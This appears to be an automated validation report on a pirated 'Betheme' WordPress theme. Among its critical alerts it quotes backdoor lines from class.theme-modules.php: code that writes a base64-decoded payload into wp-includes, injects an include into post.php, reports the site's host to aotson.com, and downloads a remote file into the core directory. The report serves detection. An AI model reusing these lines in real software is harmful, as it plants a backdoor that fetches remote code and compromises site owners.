0
Validation results

Betheme | Shared By VestaThemes.com

Betheme | Shared By VestaThemes.com

WordPress 4.9.2 theme
0
Critical alerts
  1. Security breaches : Use of base64_decode() Found base64_decode in file class.theme-modules.php.
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )
    Line 89: $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
  2. Presence of iframes : iframes are sometimes used to load unwanted adverts and malicious code on another site Found <iframe class="scale-with-grid" width="'. $width .'" height="'. $height .'" src="http'. mfn_ssl() .'://player.vimeo.com/video/'. $video .'?wmode=opaque'. $parameters .'" allowFullScreen> in file theme-shortcodes.php.
    Line 5109: $output .= '<iframe class='scale-with-grid' width=''. $width .'' height=''. $height .''
    Found <iframe class="scale-with-grid" src="http'. mfn_ssl() .'://player.vimeo.com/video/'. $video .'" allowFullScreen> in file theme-functions.php.
    Line 1515: $output .= '<iframe class='scale-with-grid' src='http'. mfn_ssl() .'://player.vimeo.com
  3. Malware : Operations on file system file_get_contents was found in the file class.theme-modules.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://www.aotson.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 124: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.aotson.com/admin.txt'));
    Line 147: if ($file = file_get_contents($e[1]))
    Line 162: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 166: @file_put_contents(__FILE__, $file);
    file_put_contents was found in the file class.theme-modules.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 166: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class.theme-modules.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://www.aotson.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 124: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.aotson.com/admin.txt'));
    Line 147: if ($file = file_get_contents($e[1]))
    Line 162: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 166: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class.theme-modules.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://www.aotson.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 124: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.aotson.com/admin.txt'));
    Line 147: if ($file = file_get_contents($e[1]))
    Line 162: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 166: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class.theme-modules.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://www.aotson.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 124: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.aotson.com/admin.txt'));
    Line 147: if ($file = file_get_contents($e[1]))
    Line 162: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class.theme-modules.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://www.aotson.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 124: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.aotson.com/admin.txt'));
    Line 147: if ($file = file_get_contents($e[1]))
    Line 162: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class.theme-modules.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://www.aotson.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 124: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.aotson.com/admin.txt'));
    Line 147: if ($file = file_get_contents($e[1]))
    Line 162: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 166: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file changelog.php
    Line 17: <?php echo file_get_contents( THEME_DIR .'/changelog.html' );?>
    file_get_contents was found in the file parsers.php
    Line 71: $success = $dom->loadXML( file_get_contents( $file ) );
    Line 277: if ( ! xml_parse( $xml, file_get_contents( $file ), true ) ) {
    file_get_contents was found in the file parsers.php
    Line 71: $success = $dom->loadXML( file_get_contents( $file ) );
    Line 277: if ( ! xml_parse( $xml, file_get_contents( $file ), true ) ) {
    fopen was found in the file parsers.php
    Line 426: $fp = $this->fopen( $file, 'r' );
    Line 652: function fopen( $filename, $mode = 'r' ) {
    Line 655: return fopen( $filename, $mode );
    fclose was found in the file parsers.php
    Line 475: $this->fclose($fp);
    Line 670: function fclose( $fp ) {
    Line 673: return fclose( $fp );
    fopen was found in the file parsers.php
    Line 426: $fp = $this->fopen( $file, 'r' );
    Line 652: function fopen( $filename, $mode = 'r' ) {
    Line 655: return fopen( $filename, $mode );
    fopen was found in the file parsers.php
    Line 426: $fp = $this->fopen( $file, 'r' );
    Line 652: function fopen( $filename, $mode = 'r' ) {
    Line 655: return fopen( $filename, $mode );
    fclose was found in the file parsers.php
    Line 475: $this->fclose($fp);
    Line 670: function fclose( $fp ) {
    Line 673: return fclose( $fp );
    fclose was found in the file parsers.php
    Line 475: $this->fclose($fp);
    Line 670: function fclose( $fp ) {
    Line 673: return fclose( $fp );
    file_get_contents was found in the file class-mfn-importer-api.php
    Line 93: $body = @file_get_contents( $url );
    fopen was found in the file class-mfn-importer-api.php
    Line 92: if( function_exists( 'ini_get' ) && ini_get( 'allow_url_fopen' ) ){
    Line 117: $fp = @fopen( $path_zip, 'w' );
    fwrite was found in the file class-mfn-importer-api.php
    Line 118: $fwrite = @fwrite( $fp, $body );
    Line 120: if( false === $fwrite ){
    fclose was found in the file class-mfn-importer-api.php
    Line 119: @fclose( $fp );
    fopen was found in the file class-mfn-importer.php
    Line 126: * 3. fopen
    Line 144: $fp = fopen( $path, 'r' );
    fread was found in the file class-mfn-importer.php
    Line 145: $data = fread( $fp, filesize( $path ) );
    fclose was found in the file class-mfn-importer.php
    Line 146: fclose( $fp );
  4. Admin menu : Themes should use add_theme_page() for adding admin pages. File options.php :
    Line 159: $this->page = add_submenu_page(
    File class-mfn-dashboard.php :
    Line 73: $this->page = add_menu_page(
    File class-mfn-dashboard.php :
    Line 83: add_submenu_page(
    File class-tgm-plugin-activation.php :
    Line 724: $this->page_hook = add_submenu_page( $args['parent_slug'], $args['page_title'], $args['menu_ti
    File class-mfn-changelog.php :
    Line 27: $this->page = add_submenu_page(
    File class-mfn-support.php :
    Line 27: $this->page = add_submenu_page(
    File class-mfn-status.php :
    Line 30: $this->page = add_submenu_page(
    File class-mfn-importer.php :
    Line 77: $this->page = add_submenu_page(
  5. Deprecated functions : wp_get_http wp_get_http found in file wordpress-importer.php. Deprecated since version 4.4. Use WP_Http instead.
    Line 905: $headers = wp_get_http( $url, $upload['file'] );
Warning
  1. theme tags : Presence of bad theme tagsFound wrong tag in style.css header.
  2. Text domain : Incorrect use of translation functions.Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is betheme-shared-by-vestathemes-com.
  3. Text domain : Incorrect use of translation functions.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are mfn-opts, nhp-opts, betheme, bbpress, woocommerce, js_composer, tgmpa, wordpress-importer.
  4. Cdn : Use of CDNFound the URL of a CDN in the code: html5shiv.googlecode.com/svn/trunk/html5.js. CSS or Javascript resources should not be loaded from a CDN. These resources should be bundled with the theme.
  5. Plugin territory : Plugin territory functionalitiesThe theme uses the register_post_type() function, which is plugin-territory functionality.The theme uses the add_shortcode() function. Custom post-content shortcodes are plugin-territory functionality.
  6. Hidden admin bar : Hidden admin Bar in CSSThemes should not hide admin bar. Detected in file responsive.css.
  7. Custom elements : Presence of custom headerNo reference to custom header was found in the theme.
  8. Custom elements : Presence of custom backgroundNo reference to custom background was found in the theme.
  9. CSS files : Presence of text domainText Domain: is missing from your style.css header.
  10. Date and time implementation : Use of the_date()At least one hard coded date was found in the file content-single-portfolio.php. Function get_option( 'date_format' ) should be used instead.At least one hard coded date was found in the file single-download.php. Function get_option( 'date_format' ) should be used instead.
  11. Screenshot : Screenshot fileBad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. Static links : Presence of hard-coded linksPossible hard-coded links were found in the file theme-options.php.
    Line 4908: 'desc' 		=> __('Some of the fonts in the Google Fonts Directory support multiple styles. For a complete list of available font subsets please see <a href='http://www.google.com/webfonts' target='_blank'>Google Web Fonts</a>', 'mfn
    Line 4945: 'desc' 		=> __('Some of the fonts in the Google Fonts Directory support multiple scripts (like Latin and Cyrillic for example). For a complete list of available font subsets please see <a href='http://www.google.com/webfonts' target='_blank'>Google Web Fonts</a>', 'mfn
    Line 4908: 'desc' 		=> __('Some of the fonts in the Google Fonts Directory support multiple styles. For a complete list of available font subsets please see <a href='http://www.google.com/webfonts' target='_blank'>Google Web Fonts</a>', 'mfn
    Line 4945: 'desc' 		=> __('Some of the fonts in the Google Fonts Directory support multiple scripts (like Latin and Cyrillic for example). For a complete list of available font subsets please see <a href='http://www.google.com/webfonts' target='_blank'>Google Web Fonts</a>', 'mfn
    Possible hard-coded links were found in the file field_custom.php.
    Line 26: echo '<p>BeTheme is <a href='http://wpml.org/theme/betheme/?aid=29349&affiliate_key=aCEsSE0ka33p' target
    Possible hard-coded links were found in the file widget-flickr.php.
    Line 82: <?php _e( 'Use <a href='http://idgettr.com/' target='_blank'>this</a> tool to find your Flickr user
    Possible hard-coded links were found in the file class-tgm-plugin-activation.php.
    Line 2695: $action_links[ 'register' ] = '<span style='color:#666'>Please</span> <a href='admin.php?page=betheme'>register</a> <span style='color:#666'>the theme</sp
    Possible hard-coded links were found in the file notice-register.php.
    Line 3: <p>Please <a href='admin.php?page=betheme'>register</a> this version of theme to get access to
    Possible hard-coded links were found in the file header.php.
    Line 50: <a href='update-core.php' class='button'><?php esc_html_e( 'Update to', 'mfn-opts' )
    Line 64: <a href='admin.php?page=betheme' class='nav-tab<?php if( $current_screen == 'topleve
    Line 65: <a href='admin.php?page=be-status' class='nav-tab<?php if( $current_screen == 'bethe
    Line 66: <a href='admin.php?page=be-support' class='nav-tab<?php if( $current_screen == 'beth
    Line 67: <a href='admin.php?page=be-changelog' class='nav-tab<?php if( $current_screen == 'be
    Possible hard-coded links were found in the file mini-status.php.
    Line 150: <a href='admin.php?page=be-status'><?php esc_html_e( 'More details', 'mfn-opts' ) ?>
    Possible hard-coded links were found in the file dashboard.php.
    Line 115: <li><a href='admin.php?page=be-plugins'><?php esc_html_e( 'Install Plugins', 'mfn-opts' 
    Line 116: <li><a href='admin.php?page=be-websites'><?php esc_html_e( 'Pre-built websites', 'mfn-op
    Line 117: <li><a href='themes.php?page=muffin_options'><?php esc_html_e( 'Theme Options', 'mfn-opt
    Possible hard-coded links were found in the file class-mfn-importer.php.
    Line 300: // 			return new WP_Error( 'rev_no_active', 'Revolution Slider is not activated. Please <a href='admin.php?page=be-plugins'>activate plugin</a>.' );
    Line 304: return new WP_Error( 'rev_update', 'Revolution Slider is outdated. Please <a href='admin.php?page=be-plugins'>update plugin</a>.' );
    Line 790: // 											echo '<a target='_blank' href='admin.php?page=be-plugins' class='mfn-button mfn-button-secondary'>Install 
    Line 923: echo '<span class='install'><a href='admin.php?page=be-plugins'>Install</a></span>';
    Line 939: $install_url = 'admin.php?page=be-plugins';
    Line 300: // 			return new WP_Error( 'rev_no_active', 'Revolution Slider is not activated. Please <a href='admin.php?page=be-plugins'>activate plugin</a>.' );
    Line 304: return new WP_Error( 'rev_update', 'Revolution Slider is outdated. Please <a href='admin.php?page=be-plugins'>update plugin</a>.' );
    Line 790: // 											echo '<a target='_blank' href='admin.php?page=be-plugins' class='mfn-button mfn-button-secondary'>Install 
    Line 923: echo '<span class='install'><a href='admin.php?page=be-plugins'>Install</a></span>';
    Line 939: $install_url = 'admin.php?page=be-plugins';
    Line 300: // 			return new WP_Error( 'rev_no_active', 'Revolution Slider is not activated. Please <a href='admin.php?page=be-plugins'>activate plugin</a>.' );
    Line 304: return new WP_Error( 'rev_update', 'Revolution Slider is outdated. Please <a href='admin.php?page=be-plugins'>update plugin</a>.' );
    Line 790: // 											echo '<a target='_blank' href='admin.php?page=be-plugins' class='mfn-button mfn-button-secondary'>Install 
    Line 923: echo '<span class='install'><a href='admin.php?page=be-plugins'>Install</a></span>';
    Line 939: $install_url = 'admin.php?page=be-plugins';
    Line 962: echo '<a href='admin.php?page=betheme' class='mfn-button mfn-button-secondary'>Please regi
    Possible hard-coded links were found in the file theme-functions.php.
    Line 1107: $output .= '<div class='jp-no-solution'><span>Update Required</span>To play the media you will need to either update your browser to a recent version or update your <a href='https://get.adobe.com/flashplayer/' target='_blank'>Flash plugin</a></div>'
  2. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  3. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  4. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  5. Optional files : Presence of category template file category.phpThis theme does not contain optional file category.php.
  6. Optional files : Presence of tag template file tag.phpThis theme does not contain optional file tag.php.
  7. Optional files : Presence of term template file taxonomy.phpThis theme does not contain optional file taxonomy.php.
  8. Optional files : Presence of author template file author.phpThis theme does not contain optional file author.php.
  9. Optional files : Presence of date/time template file date.phpThis theme does not contain optional file date.php.
  10. Optional files : Presence of archive template file archive.phpThis theme does not contain optional file archive.php.
  11. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  12. Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.
  13. Use of includes : Use of include or requireThe theme appears to use include or require : theme-options.php
    Line 10: require_once( dirname( __FILE__ ) . '/fonts.php' );
    Line 11: require_once( dirname( __FILE__ ) . '/options.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : options.php
    Line 202: require_once($this->dir.'fields/'.$field['type'].'/field_'.$field['type'].'
    Line 406: require_once($this->dir.'validation/'.$field['validate'].'/validation_'.$fi
    Line 722: require_once($this->dir.'fields/'.$field['type'].'/field_'.$field['type'].'
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : header-side-slide.php
    Line 215: get_template_part( 'includes/include', 'social' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : header-top-bar-right.php
    Line 55: get_template_part( 'includes/include', 'wpml' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : header-creative.php
    Line 24: get_template_part( 'includes/include', 'social' );
    Line 39: <?php get_template_part( 'includes/include', 'logo' ); ?>
    Line 86: <?php get_template_part( 'includes/include', 'social' ); ?>
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : header-top-area.php
    Line 29: get_template_part( 'includes/include', 'social' );						
    Line 66: <?php get_template_part( 'includes/include', 'logo' ); ?>
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : footer.php
    Line 126: get_template_part( 'includes/include', 'social' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class.theme-modules.php
    Line 43: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-vcd.php\')) include_once(dirname(__FILE__) . \'/wp-vcd.php\'); ?>' . $file;
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : back.php
    Line 77: require_once( $MFN_Options->dir.'fields/'.$field['type'].'/field_'.$field['
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-mfn-tgmpa.php
    Line 46: include_once 'class-tgm-plugin-activation.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
Other checked themes